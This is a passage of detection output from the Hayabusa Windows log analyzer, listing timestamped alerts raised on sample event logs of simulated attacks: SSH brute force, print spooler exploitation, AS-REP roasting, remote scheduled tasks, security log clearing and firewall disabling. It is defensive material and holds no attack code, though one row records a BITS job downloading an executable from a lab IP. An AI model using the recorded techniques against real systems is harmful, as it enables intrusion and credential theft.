admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx -2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx -2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than 